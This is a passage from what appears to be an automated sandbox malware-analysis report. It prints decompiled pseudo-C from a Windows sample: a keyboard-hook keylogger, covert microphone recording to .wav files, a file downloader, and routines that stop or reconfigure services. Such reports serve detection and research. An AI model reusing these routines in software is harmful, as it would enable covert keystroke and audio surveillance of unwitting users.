                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _strstr$_strncpy
                                                                                                • String ID: ALL$DEFAULT$ECDSA$TLS_AES_128_GCM_SHA256
                                                                                                • API String ID: 1902495667-1012175531
                                                                                                • Opcode ID: 520ac5c39132e33c9ff3aec006f2acede2107cf21970011d3ed55495355a54b6
                                                                                                • Instruction ID: cd7da3a8f255e0bc2093fbe4f40c58f9e38a3687f7fab9f5ed61b317d639080b
                                                                                                • Opcode Fuzzy Hash: 520ac5c39132e33c9ff3aec006f2acede2107cf21970011d3ed55495355a54b6
                                                                                                • Instruction Fuzzy Hash: C151F4B5E843499BDF209E658CC1BEFB7A49B45304F18416BDC84A7342E2798982C79A
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 89%
                                                                                                			E00406475(intOrPtr __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, char _a12) {
                                                                                                				intOrPtr _v8;
                                                                                                				char _v12;
                                                                                                				intOrPtr _v16;
                                                                                                				void* _v20;
                                                                                                				long _v24;
                                                                                                				char _v48;
                                                                                                				char _v72;
                                                                                                				void _v100076;
                                                                                                				void* __ebx;
                                                                                                				void* _t37;
                                                                                                				WCHAR* _t39;
                                                                                                				long _t46;
                                                                                                				struct _OVERLAPPED* _t58;
                                                                                                				intOrPtr _t77;
                                                                                                				long _t81;
                                                                                                				void* _t82;
                                                                                                				void* _t84;
                                                                                                				void* _t87;
                                                                                                
                                                                                                				E00451ED0();
                                                                                                				_t74 =  &_a12;
                                                                                                				asm("xorps xmm0, xmm0");
                                                                                                				_v16 = __ecx;
                                                                                                				_t58 = 0;
                                                                                                				asm("movlpd [ebp-0x8], xmm0");
                                                                                                				_v24 = 0;
                                                                                                				E0040330C(0,  &_v48, __eflags, E00407677( &_v72,  &_a12, __eflags, L".part"));
                                                                                                				E00401EE2();
                                                                                                				_t37 = CreateFileW(E00401EDD( &_v48), 4, 0, 0, 2, 0x80, 0);
                                                                                                				_v20 = _t37;
                                                                                                				_t84 = _v8 - _a8;
                                                                                                				if(_t84 > 0) {
                                                                                                					L8:
                                                                                                					CloseHandle(_t37);
                                                                                                					_t39 = E00401EDD( &_a12);
                                                                                                					MoveFileW(E00401EDD( &_v48), _t39);
                                                                                                					_t58 = 1;
                                                                                                				} else {
                                                                                                					_t77 = _a4;
                                                                                                					if(_t84 < 0) {
                                                                                                						goto L3;
                                                                                                					} else {
                                                                                                						_t85 = _v12 - _t77;
                                                                                                						if(_v12 >= _t77) {
                                                                                                							goto L8;
                                                                                                						} else {
                                                                                                							while(1) {
                                                                                                								L3:
                                                                                                								_t46 = E00404C83( &_v100076, 0x186a0);
                                                                                                								_t81 = _t46;
                                                                                                								asm("cdq");
                                                                                                								_v12 = _v12 + _t46;
                                                                                                								asm("adc [ebp-0x4], edx");
                                                                                                								WriteFile(_v20,  &_v100076, _t81,  &_v24, _t58);
                                                                                                								_t82 = _t82 - 0x18;
                                                                                                								E0040209D(_t58, _t82, _t74, _t85,  &_v12, 8);
                                                                                                								E00404BB7(_t58, _v16, _t74, _t85, 0x57, _v16);
                                                                                                								if(_t81 <= 0) {
                                                                                                									break;
                                                                                                								}
                                                                                                								_t87 = _v8 - _a8;
                                                                                                								if(_t87 < 0 || _t87 <= 0 && _v12 < _t77) {
                                                                                                									continue;
                                                                                                								} else {
                                                                                                									_t37 = _v20;
                                                                                                									goto L8;
                                                                                                								}
                                                                                                								goto L9;
                                                                                                							}
                                                                                                							CloseHandle(_v20);
                                                                                                							DeleteFileW(E00401EDD( &_v48));
                                                                                                						}
                                                                                                					}
                                                                                                				}
                                                                                                				L9:
                                                                                                				E00401EE2();
                                                                                                				E00401EE2();
                                                                                                				return _t58;
                                                                                                			}





















                                                                                                0x0040657b
                                                                                                0x00406588

                                                                                                APIs
                                                                                                  • Part of subcall function 00407677: char_traits.LIBCPMT ref: 00407692
                                                                                                • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000), ref: 004064CE
                                                                                                • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,000186A0,?), ref: 00406516
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00406550
                                                                                                • MoveFileW.KERNEL32(00000000,00000000), ref: 00406568
                                                                                                • CloseHandle.KERNEL32(?,00000057,?,00000008), ref: 0040658C
                                                                                                • DeleteFileW.KERNEL32(00000000), ref: 0040659B
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: File$CloseHandle$CreateDeleteMoveWritechar_traits
                                                                                                • String ID: .part
                                                                                                • API String ID: 820096542-3499674018
                                                                                                • Opcode ID: 92dd9859f071b579d5e718dfa42dd3fb22f93718b8df13da347ad2c13636152f
                                                                                                • Instruction ID: be89533d43fe4845dc1d95fb5f45a04cabfc61fa4ca913dd6281d477e5a4a642
                                                                                                • Opcode Fuzzy Hash: 92dd9859f071b579d5e718dfa42dd3fb22f93718b8df13da347ad2c13636152f
                                                                                                • Instruction Fuzzy Hash: 6C314A71D00218ABCB00EFA5DC869EEB778FB44315F10856FF912B71D1DA74AA44CB98
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 95%
                                                                                                			E00401CE1(void* __ebx, void* __edi, intOrPtr _a8) {
                                                                                                				char _v84;
                                                                                                				char _v112;
                                                                                                				void* _v116;
                                                                                                				char _v136;
                                                                                                				void* _v140;
                                                                                                				char _v160;
                                                                                                				void* _v164;
                                                                                                				char _v184;
                                                                                                				void* _v188;
                                                                                                				char _v204;
                                                                                                				char _v208;
                                                                                                				void* _v212;
                                                                                                				char _v228;
                                                                                                				char _v232;
                                                                                                				char _v236;
                                                                                                				void* __esi;
                                                                                                				void* _t29;
                                                                                                				intOrPtr _t43;
                                                                                                				void* _t75;
                                                                                                
                                                                                                				_t47 = __ebx;
                                                                                                				_push(_t75);
                                                                                                				E00401F5F(__ebx,  &_v228);
                                                                                                				_t82 = _a8 - 0x3c0;
                                                                                                				if(_a8 == 0x3c0) {
                                                                                                					E004016F0();
                                                                                                					E00436419( &_v84, 0x50, "%Y-%m-%d %H.%M", E004016E8());
                                                                                                					E00402076(__ebx,  &_v204,  &_v84);
                                                                                                					_t29 = E00417CCA( &_v112,  &_v208);
                                                                                                					E00401EEC( &_v232, _t31, _t75, E00403098(_t47,  &_v184, E00403022( &_v160, E00402FEC(__ebx,  &_v136, 0x46e0d4, 0x5c), _t29), __edi, _t82, L".wav"));
                                                                                                					E00401EE2();
                                                                                                					E00401EE2();
                                                                                                					E00401EE2();
                                                                                                					E00401EE2();
                                                                                                					E00401FB9();
                                                                                                					E00401A56(E00401EDD( &_v236), 0x46da78);
                                                                                                					waveInUnprepareHeader( *0x46dab0, 0x46da78, 0x20);
                                                                                                					0x46da78->lpData = E00401F87(0x46e0ec);
                                                                                                					_t43 =  *0x46dab4; // 0x0
                                                                                                					 *0x46da7c = _t43;
                                                                                                					 *0x46da80 = 0;
                                                                                                					 *0x46da84 = 0;
                                                                                                					 *0x46da88 = 0;
                                                                                                					 *0x46da8c = 0;
                                                                                                					waveInPrepareHeader( *0x46dab0, 0x46da78, 0x20);
                                                                                                					waveInAddBuffer( *0x46dab0, 0x46da78, 0x20);
                                                                                                				}
                                                                                                				return E00401EE2();
                                                                                                			}

                                                                                                APIs
                                                                                                • _strftime.LIBCMT ref: 00401D26
                                                                                                  • Part of subcall function 00401A56: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401ABE
                                                                                                • waveInUnprepareHeader.WINMM(0046DA78,00000020,00000000,?), ref: 00401DD8
                                                                                                • waveInPrepareHeader.WINMM(0046DA78,00000020), ref: 00401E16
                                                                                                • waveInAddBuffer.WINMM(0046DA78,00000020), ref: 00401E25
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                                                                                • String ID: %Y-%m-%d %H.%M$.wav$F
                                                                                                • API String ID: 3809562944-2410650082
                                                                                                • Opcode ID: 439791445c359e82fea0f4087b347580bae1cee26d51ed52abe1849038b35182
                                                                                                • Instruction ID: 347f834822c73c8dafb4de3389cfef65f10b8848add3604802dc12ff50851c95
                                                                                                • Opcode Fuzzy Hash: 439791445c359e82fea0f4087b347580bae1cee26d51ed52abe1849038b35182
                                                                                                • Instruction Fuzzy Hash: E2315C31A082009BC314EB62DC45AAE77A8AB54308F10883EF556A21F1EFB89905CB4E
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 95%
                                                                                                			E00401BBF(void* __eflags) {
                                                                                                				signed short _t3;
                                                                                                				signed int _t7;
                                                                                                				signed int _t15;
                                                                                                				signed int _t24;
                                                                                                				signed int _t25;
                                                                                                				intOrPtr* _t33;
                                                                                                				void* _t34;
                                                                                                
                                                                                                				_t34 = __eflags;
                                                                                                				CreateDirectoryW(E00401EDD(0x46e0d4), 0);
                                                                                                				_t3 = 8;
                                                                                                				 *0x46daa6 = _t3;
                                                                                                				 *0x46da9c = 0x1f40;
                                                                                                				 *0x46daa0 = 0x1f40;
                                                                                                				0x46da98->wFormatTag = 1;
                                                                                                				 *0x46da9a = 1;
                                                                                                				 *0x46daa4 = 1;
                                                                                                				 *0x46daa8 = 0;
                                                                                                				_t7 = E004374E4(_t5, E00401F87(E00401E3B(0x46e3a4, 1, _t34, 0x24)));
                                                                                                				_t24 =  *0x46da9c; // 0x0
                                                                                                				 *_t33 = 0x30008;
                                                                                                				_t25 = _t24 * _t7 * 0x3c;
                                                                                                				 *0x46daac = _t25;
                                                                                                				 *0x46dab4 = (( *0x46daa6 & 0x0000ffff) >> 3) * _t25;
                                                                                                				waveInOpen(0x46dab0, 0xffffffff, 0x46da98, E00401CE1, 0, ??);
                                                                                                				E00401F76( *0x46dab4);
                                                                                                				0x46da78->lpData = E00401F87(0x46e0ec);
                                                                                                				_t15 =  *0x46dab4; // 0x0
                                                                                                				 *0x46da7c = _t15;
                                                                                                				 *0x46da80 = 0;
                                                                                                				 *0x46da84 = 0;
                                                                                                				 *0x46da88 = 0;
                                                                                                				 *0x46da8c = 0;
                                                                                                				waveInPrepareHeader( *0x46dab0, 0x46da78, 0x20);
                                                                                                				waveInAddBuffer( *0x46dab0, 0x46da78, 0x20);
                                                                                                				waveInStart( *0x46dab0);
                                                                                                				return 0;
                                                                                                			}

                                                                                                APIs
                                                                                                • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BCF
                                                                                                • waveInOpen.WINMM(0046DAB0,000000FF,0046DA98,Function_00001CE1,00000000,00000000,00000024), ref: 00401C65
                                                                                                • waveInPrepareHeader.WINMM(0046DA78,00000020), ref: 00401CB9
                                                                                                • waveInAddBuffer.WINMM(0046DA78,00000020), ref: 00401CC8
                                                                                                • waveInStart.WINMM ref: 00401CD4
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                                                                                • String ID: hpg$F
                                                                                                • API String ID: 1356121797-1242473504
                                                                                                • Opcode ID: 097767aace1de835545a3a18a84c3289a1f94376d5320f4cad483d40ad5015f6
                                                                                                • Instruction ID: b43c0b4c7f0bc09488247941d99da72d6ed0c481dd2e64c2db2638474b3c5267
                                                                                                • Opcode Fuzzy Hash: 097767aace1de835545a3a18a84c3289a1f94376d5320f4cad483d40ad5015f6
                                                                                                • Instruction Fuzzy Hash: 8D211B71F5C2009BC704AFF6AD05A2A7AA5AB99314704413BF509DAAB1FBF84442CB0E
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 77%
                                                                                                			E00416FA1(signed char __ecx, char _a4) {
                                                                                                				signed char _v5;
                                                                                                				void* _t7;
                                                                                                				signed int _t11;
                                                                                                				void* _t17;
                                                                                                				short* _t21;
                                                                                                				signed int _t24;
                                                                                                				int _t25;
                                                                                                				void* _t28;
                                                                                                				void* _t31;
                                                                                                
                                                                                                				_push(__ecx);
                                                                                                				_t21 = 0;
                                                                                                				_v5 = __ecx;
                                                                                                				_t7 = OpenSCManagerW(0, 0, 2);
                                                                                                				_t2 =  &_a4; // 0x4166e5
                                                                                                				_t24 = _t2;
                                                                                                				_t31 = _t7;
                                                                                                				_t28 = OpenServiceW(_t31, E00401EDD(_t24), 2);
                                                                                                				if(_t28 != 0) {
                                                                                                					_t25 = _t24 | 0xffffffff;
                                                                                                					_t11 = _v5 & 0x000000ff;
                                                                                                					if(_t11 == 0) {
                                                                                                						_push(4);
                                                                                                						goto L8;
                                                                                                					} else {
                                                                                                						_t17 = _t11 - 1;
                                                                                                						if(_t17 == 0) {
                                                                                                							_push(2);
                                                                                                							goto L8;
                                                                                                						} else {
                                                                                                							if(_t17 == 1) {
                                                                                                								_push(3);
                                                                                                								L8:
                                                                                                								_pop(_t25);
                                                                                                							}
                                                                                                						}
                                                                                                					}
                                                                                                					_t21 = _t21 & 0xffffff00 | ChangeServiceConfigW(_t28, 0xffffffff, _t25, 0xffffffff, _t21, _t21, _t21, _t21, _t21, _t21, _t21) != 0x00000000;
                                                                                                					CloseServiceHandle(_t31);
                                                                                                					CloseServiceHandle(_t28);
                                                                                                				} else {
                                                                                                					CloseServiceHandle(_t31);
                                                                                                				}
                                                                                                				E00401EE2();
                                                                                                				return _t21;
                                                                                                			}













                                                                                                APIs
                                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,004166E5,00000000), ref: 00416FB1
                                                                                                • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,004166E5,00000000), ref: 00416FC5
                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,004166E5,00000000), ref: 00416FD2
                                                                                                • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,004166E5,00000000), ref: 00417007
                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,004166E5,00000000), ref: 00417019
                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,004166E5,00000000), ref: 0041701C
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                                                                                • String ID: fA
                                                                                                • API String ID: 493672254-3595381179
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 90%
                                                                                                			E004088C8(struct HHOOK__** __ecx) {
                                                                                                				struct tagMSG _v32;
                                                                                                				char _v60;
                                                                                                				void* _v64;
                                                                                                				void* __edi;
                                                                                                				int _t7;
                                                                                                				void* _t8;
                                                                                                				struct HHOOK__* _t14;
                                                                                                				void* _t16;
                                                                                                				void* _t22;
                                                                                                				struct HHOOK__** _t34;
                                                                                                				signed int _t36;
                                                                                                				void* _t38;
                                                                                                
                                                                                                				_t38 = (_t36 & 0xfffffff8) - 0x38;
                                                                                                				_t34 = __ecx;
                                                                                                				 *0x46dae4 = __ecx;
                                                                                                				if( *((intOrPtr*)(__ecx)) != 0) {
                                                                                                					goto L3;
                                                                                                				} else {
                                                                                                					_t14 = SetWindowsHookExA(0xd, E004088B1, GetModuleHandleA(0), 0);
                                                                                                					 *_t34 = _t14;
                                                                                                					_t43 = _t14;
                                                                                                					if(_t14 != 0) {
                                                                                                						while(1) {
                                                                                                							L3:
                                                                                                							_t7 = GetMessageA( &_v32, 0, 0, 0);
                                                                                                							__eflags = _t7;
                                                                                                							if(_t7 == 0) {
                                                                                                								break;
                                                                                                							}
                                                                                                							TranslateMessage( &_v32);
                                                                                                							DispatchMessageA( &_v32);
                                                                                                							__eflags =  *_t34;
                                                                                                							if( *_t34 != 0) {
                                                                                                								continue;
                                                                                                							}
                                                                                                							break;
                                                                                                						}
                                                                                                						_t8 = 0;
                                                                                                						__eflags = 0;
                                                                                                					} else {
                                                                                                						_t16 = E00417C16(_t22,  &_v60, GetLastError());
                                                                                                						_t39 = _t38 - 0x18;
                                                                                                						E004053F2(_t22, _t38 - 0x18, "Keylogger initialization failure: error ", 0, _t43, _t16);
                                                                                                						E00402076(_t22, _t39 - 0x14, "E");
                                                                                                						E00417670(_t22, 0);
                                                                                                						E00401FB9();
                                                                                                						_t8 = 1;
                                                                                                					}
                                                                                                				}
                                                                                                				return _t8;
                                                                                                			}
















                                                                                                APIs
                                                                                                • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 004088E3
                                                                                                • SetWindowsHookExA.USER32 ref: 004088F1
                                                                                                • GetLastError.KERNEL32 ref: 004088FD
                                                                                                  • Part of subcall function 00417670: GetLocalTime.KERNEL32(00000000), ref: 0041768A
                                                                                                • GetMessageA.USER32 ref: 0040894B
                                                                                                • TranslateMessage.USER32(?), ref: 0040895A
                                                                                                • DispatchMessageA.USER32 ref: 00408965
                                                                                                Strings
                                                                                                • Keylogger initialization failure: error , xrefs: 00408911
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                                                                                • String ID: Keylogger initialization failure: error
                                                                                                • API String ID: 3219506041-952744263
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 100%
                                                                                                			E00416DCF(char _a4) {
                                                                                                				struct _SERVICE_STATUS _v32;
                                                                                                				void* _t6;
                                                                                                				signed int _t16;
                                                                                                				void* _t19;
                                                                                                				void* _t20;
                                                                                                
                                                                                                				_t16 = 0;
                                                                                                				_t6 = OpenSCManagerW(0, 0, 0x20);
                                                                                                				_t1 =  &_a4; // 0x41697a
                                                                                                				_t20 = _t6;
                                                                                                				_t19 = OpenServiceW(_t20, E00401EDD(_t1), 0x20);
                                                                                                				if(_t19 != 0) {
                                                                                                					_t16 = 0 | ControlService(_t19, 1,  &_v32) != 0x00000000;
                                                                                                					CloseServiceHandle(_t20);
                                                                                                					CloseServiceHandle(_t19);
                                                                                                				} else {
                                                                                                					CloseServiceHandle(_t20);
                                                                                                				}
                                                                                                				E00401EE2();
                                                                                                				return _t16;
                                                                                                			}









                                                                                                APIs
                                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,0041697A,00000000), ref: 00416DDE
                                                                                                • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041697A,00000000), ref: 00416DF2
                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041697A,00000000), ref: 00416DFF
                                                                                                • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041697A,00000000), ref: 00416E0E
                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041697A,00000000), ref: 00416E20
                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041697A,00000000), ref: 00416E23
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                • String ID: ziA
                                                                                                • API String ID: 221034970-331584892
                                                                                                • Opcode ID: 5526fed76c8f8bf79b05816383fd671647c2f0a412dd3caeeeffb9ef9c7d9df4
                                                                                                • Instruction ID: 4a585f2d2376b6d5ac9c9cece389b6aa10fb0938e1b78b412e20c9ed5c4354ef
                                                                                                • Opcode Fuzzy Hash: 5526fed76c8f8bf79b05816383fd671647c2f0a412dd3caeeeffb9ef9c7d9df4
                                                                                                • Instruction Fuzzy Hash: 17F022325003186BD210AF65DC89DBF3B6CDB80B65F10002AFE0596182DA38CD8595E4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 100%
                                                                                                			E00416F3A(char _a4) {
                                                                                                				struct _SERVICE_STATUS _v32;
                                                                                                				void* _t6;
                                                                                                				signed int _t16;
                                                                                                				void* _t19;
                                                                                                				void* _t20;
                                                                                                
                                                                                                				_t16 = 0;
                                                                                                				_t6 = OpenSCManagerW(0, 0, 0x40);
                                                                                                				_t1 =  &_a4; // 0x41687a
                                                                                                				_t20 = _t6;
                                                                                                				_t19 = OpenServiceW(_t20, E00401EDD(_t1), 0x40);
                                                                                                				if(_t19 != 0) {
                                                                                                					_t16 = 0 | ControlService(_t19, 3,  &_v32) != 0x00000000;
                                                                                                					CloseServiceHandle(_t20);
                                                                                                					CloseServiceHandle(_t19);
                                                                                                				} else {
                                                                                                					CloseServiceHandle(_t20);
                                                                                                				}
                                                                                                				E00401EE2();
                                                                                                				return _t16;
                                                                                                			}









                                                                                                APIs
                                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041687A,00000000), ref: 00416F49
                                                                                                • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041687A,00000000), ref: 00416F5D
                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041687A,00000000), ref: 00416F6A
                                                                                                • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,0041687A,00000000), ref: 00416F79
                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041687A,00000000), ref: 00416F8B
                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041687A,00000000), ref: 00416F8E
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                • String ID: zhA
                                                                                                • API String ID: 221034970-181969981
                                                                                                • Opcode ID: a4d7d90dc3ff4088f4becfd339648ac572e134073d05af946aa15752de00ce0c
                                                                                                • Instruction ID: 24d2e802748d46b42a904b5a9824533a6e6e85186698bd289f6eec39f182f73e
                                                                                                • Opcode Fuzzy Hash: a4d7d90dc3ff4088f4becfd339648ac572e134073d05af946aa15752de00ce0c
                                                                                                • Instruction Fuzzy Hash: 0EF0C2325002186BD210AF65EC89EBF3B6CDB85B55F11002AFF099A192DA38DD8695F9
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 69%
                                                                                                			E004447E8(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
                                                                                                				signed int _v8;
                                                                                                				int _v12;
                                                                                                				void* _v24;
                                                                                                				signed int _t49;
                                                                                                				signed int _t54;
                                                                                                				int _t58;
                                                                                                				signed int _t60;
                                                                                                				short* _t62;
                                                                                                				signed int _t66;
                                                                                                				short* _t70;
                                                                                                				int _t71;
                                                                                                				int _t78;
                                                                                                				short* _t81;
                                                                                                				signed int _t87;
                                                                                                				signed int _t90;
                                                                                                				void* _t95;
                                                                                                				void* _t96;
                                                                                                				int _t98;
                                                                                                				short* _t101;
                                                                                                				int _t103;
                                                                                                				signed int _t106;
                                                                                                				short* _t107;
                                                                                                				void* _t110;
                                                                                                
                                                                                                				_push(__ecx);
                                                                                                				_push(__ecx);
                                                                                                				_t49 =  *0x46c00c; // 0x4cc22724
                                                                                                				_v8 = _t49 ^ _t106;
                                                                                                				_push(__esi);
                                                                                                				_t103 = _a20;
                                                                                                				if(_t103 > 0) {
                                                                                                					_t78 = E004414B9(_a16, _t103);
                                                                                                					_t110 = _t78 - _t103;
                                                                                                					_t4 = _t78 + 1; // 0x1
                                                                                                					_t103 = _t4;
                                                                                                					if(_t110 >= 0) {
                                                                                                						_t103 = _t78;
                                                                                                					}
                                                                                                				}
                                                                                                				_t98 = _a32;
                                                                                                				if(_t98 == 0) {
                                                                                                					_t98 =  *( *_a4 + 8);
                                                                                                					_a32 = _t98;
                                                                                                				}
                                                                                                				_t54 = MultiByteToWideChar(_t98, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t103, 0, 0);
                                                                                                				_v12 = _t54;
                                                                                                				if(_t54 == 0) {
                                                                                                					L38:
                                                                                                					return E00430A5B(_v8 ^ _t106);
                                                                                                				} else {
                                                                                                					_t95 = _t54 + _t54;
                                                                                                					_t85 = _t95 + 8;
                                                                                                					asm("sbb eax, eax");
                                                                                                					if((_t95 + 0x00000008 & _t54) == 0) {
                                                                                                						_t81 = 0;
                                                                                                						__eflags = 0;
                                                                                                						L14:
                                                                                                						if(_t81 == 0) {
                                                                                                							L36:
                                                                                                							_t105 = 0;
                                                                                                							L37:
                                                                                                							E004318FD(_t81);
                                                                                                							goto L38;
                                                                                                						}
                                                                                                						_t58 = MultiByteToWideChar(_t98, 1, _a16, _t103, _t81, _v12);
                                                                                                						_t121 = _t58;
                                                                                                						if(_t58 == 0) {
                                                                                                							goto L36;
                                                                                                						}
                                                                                                						_t100 = _v12;
                                                                                                						_t60 = E00443906(_t85, _t103, _t121, _a8, _a12, _t81, _v12, 0, 0, 0, 0, 0);
                                                                                                						_t105 = _t60;
                                                                                                						if(_t105 == 0) {
                                                                                                							goto L36;
                                                                                                						}
                                                                                                						if((_a12 & 0x00000400) == 0) {
                                                                                                							_t96 = _t105 + _t105;
                                                                                                							_t87 = _t96 + 8;
                                                                                                							__eflags = _t96 - _t87;
                                                                                                							asm("sbb eax, eax");
                                                                                                							__eflags = _t87 & _t60;
                                                                                                							if((_t87 & _t60) == 0) {
                                                                                                								_t101 = 0;
                                                                                                								__eflags = 0;
                                                                                                								L30:
                                                                                                								__eflags = _t101;
                                                                                                								if(__eflags == 0) {
                                                                                                									L35:
                                                                                                									E004318FD(_t101);
                                                                                                									goto L36;
                                                                                                								}
                                                                                                								_t62 = E00443906(_t87, _t105, __eflags, _a8, _a12, _t81, _v12, _t101, _t105, 0, 0, 0);
                                                                                                								__eflags = _t62;
                                                                                                								if(_t62 == 0) {
                                                                                                									goto L35;
                                                                                                								}
                                                                                                								_push(0);
                                                                                                								_push(0);
